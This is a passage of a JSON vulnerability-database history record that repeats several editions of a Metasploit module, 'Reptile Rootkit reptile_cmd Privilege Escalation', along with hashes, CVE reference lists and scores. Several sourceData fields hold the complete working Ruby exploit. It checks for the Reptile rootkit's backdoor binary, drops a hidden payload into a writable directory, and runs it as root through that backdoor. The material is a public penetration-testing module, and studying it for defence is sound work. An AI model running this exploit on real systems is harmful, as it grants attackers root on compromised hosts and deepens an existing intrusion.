def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-19T20:03:20", "differentElements": ["modified", "published", "sourceData"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "c6af0b24c51a39d8b1daa9f3ec55e638", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-20T10:20:36", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2015-2923", "CVE-2019-1950", "CVE-2020-3153", "CVE-2020-3138", "CVE-2020-4230", "CVE-2020-4204", "CVE-2020-4135", "CVE-2020-4200", "CVE-2020-4161"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0234-1", "OPENSUSE-SU-2020:0233-1"]}, {"type": "threatpost", "idList": ["THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:CDD479681D16E5E813A006B44143393D"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "nessus", "idList": ["FEDORA_2020-6E76510E21.NASL", "SUSE_SU-2020-0397-1.NASL", "F5_BIGIP_SOL64292204.NASL", "CENTOS_RHSA-2020-0540.NASL", "CENTOS_RHSA-2020-0520.NASL"]}], "modified": "2020-02-20T10:20:36"}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-02-20T10:20:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-20T10:20:36", "differentElements": ["modified", "published", "sourceData"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-20T12:04:28", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2011-2498", "CVE-2015-2923", "CVE-2014-4660", "CVE-2014-4678", "CVE-2019-1950", "CVE-2020-3153", "CVE-2020-3138", "CVE-2012-0055", "CVE-2020-4135", "CVE-2020-4230"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0234-1", "OPENSUSE-SU-2020:0233-1"]}, {"type": "threatpost", "idList": ["THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:CDD479681D16E5E813A006B44143393D"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-0397-1.NASL"]}], "modified": "2020-02-20T12:04:28"}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-02-20T12:04:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-20T12:04:28", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-21T00:15:41", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0564"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:15372C7C7C6D5197C86D1DC94BC765B2"]}, {"type": "mssecure", "idList": ["MSSECURE:FB439DF2C9422E5DA21ECEF86203F9A6", "MSSECURE:B86021984F07A5549C9E32C0E24776B4"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:C4AF0A8BAD982FCEEA5F62B29F0D88FD"]}, {"type": "securelist", "idList": ["SECURELIST:CA9548359F6E1B6D1F71CE3E34AE9762"]}, {"type": "cve", "idList": ["CVE-2011-2498", "CVE-2015-2923", "CVE-2014-4660", "CVE-2014-4678"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0234-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:D3931D51228BAFB9F271664EF7C0E3B6", "CFOUNDRY:4EF44EDC35D1E22AB90D85E4ED1E4E55"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844349", "OPENVAS:1361412562310853043", "OPENVAS:1361412562310704628", "OPENVAS:1361412562310892109"]}, {"type": "ics", "idList": ["ICSA-20-051-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0559"]}], "modified": "2020-02-21T00:15:41"}, "score": {"value": 6.5, "vector": "NONE", "modified": "2020-02-21T00:15:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-21T00:15:41", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-21T02:10:33", "history": [], "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0564"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:15372C7C7C6D5197C86D1DC94BC765B2"]}, {"type": "mssecure", "idList": ["MSSECURE:FB439DF2C9422E5DA21ECEF86203F9A6", "MSSECURE:B86021984F07A5549C9E32C0E24776B4"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:C4AF0A8BAD982FCEEA5F62B29F0D88FD"]}, {"type": "securelist", "idList": ["SECURELIST:CA9548359F6E1B6D1F71CE3E34AE9762"]}, {"type": "cve", "idList": ["CVE-2011-2498", "CVE-2015-2923", "CVE-2014-4660", "CVE-2014-4678"]}, {"type": "amazon", "idList": ["ALAS-2020-1345"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0234-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704628", "OPENVAS:1361412562310853043", "OPENVAS:1361412562310844349", "OPENVAS:1361412562310892109"]}, {"type": "ics", "idList": ["ICSA-20-051-01"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:D3931D51228BAFB9F271664EF7C0E3B6", "CFOUNDRY:4EF44EDC35D1E22AB90D85E4ED1E4E55"]}], "modified": "2020-02-21T02:10:33"}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-02-21T02:10:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-21T02:10:33", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-23T08:02:45", "history": [], "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-9353", "CVE-2020-9342", "CVE-2019-19452", "CVE-2016-4606"]}, {"type": "zdt", "idList": ["1337DAY-ID-33996"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5541"]}, {"type": "threatpost", "idList": ["THREATPOST:5E2F5558E8D09A638E098520D12B6422"]}, {"type": "thn", "idList": ["THN:229FEDE2A9FA87B37292097D346CD2DF"]}, {"type": "kitploit", "idList": ["KITPLOIT:1380526137884005801"]}, {"type": "schneier", "idList": ["SCHNEIER:B9DC2C2A858E6663524AB242FB096389"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C6C252288047D319ADE770A26A8DA196"]}, {"type": "redhat", "idList": ["RHSA-2020:0564"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892112", "OPENVAS:1361412562310892111", "OPENVAS:1361412562310143543", "OPENVAS:1361412562310143541"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156475", "PACKETSTORM:156474"]}, {"type": "virtuozzo", "idList": ["VZA-2020-016"]}], "modified": "2020-02-23T08:02:45"}, "score": {"value": 4.0, "vector": "NONE", "modified": "2020-02-23T08:02:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-23T08:02:45", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-23T12:00:57", "history": [], "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-9353", "CVE-2020-9342", "CVE-2019-19452", "CVE-2016-4606"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5541"]}, {"type": "zdt", "idList": ["1337DAY-ID-33996"]}, {"type": "threatpost", "idList": ["THREATPOST:5E2F5558E8D09A638E098520D12B6422"]}, {"type": "thn", "idList": ["THN:229FEDE2A9FA87B37292097D346CD2DF"]}, {"type": "kitploit", "idList": ["KITPLOIT:1380526137884005801"]}, {"type": "schneier", "idList": ["SCHNEIER:B9DC2C2A858E6663524AB242FB096389"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C6C252288047D319ADE770A26A8DA196"]}, {"type": "redhat", "idList": ["RHSA-2020:0564"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892111", "OPENVAS:1361412562310892112", "OPENVAS:1361412562310143543", "OPENVAS:1361412562310143541"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156474", "PACKETSTORM:156475"]}, {"type": "virtuozzo", "idList": ["VZA-2020-016"]}], "modified": "2020-02-23T12:00:57"}, "score": {"value": 4.9, "vector": "NONE", "modified": "2020-02-23T12:00:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-23T12:00:57", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with 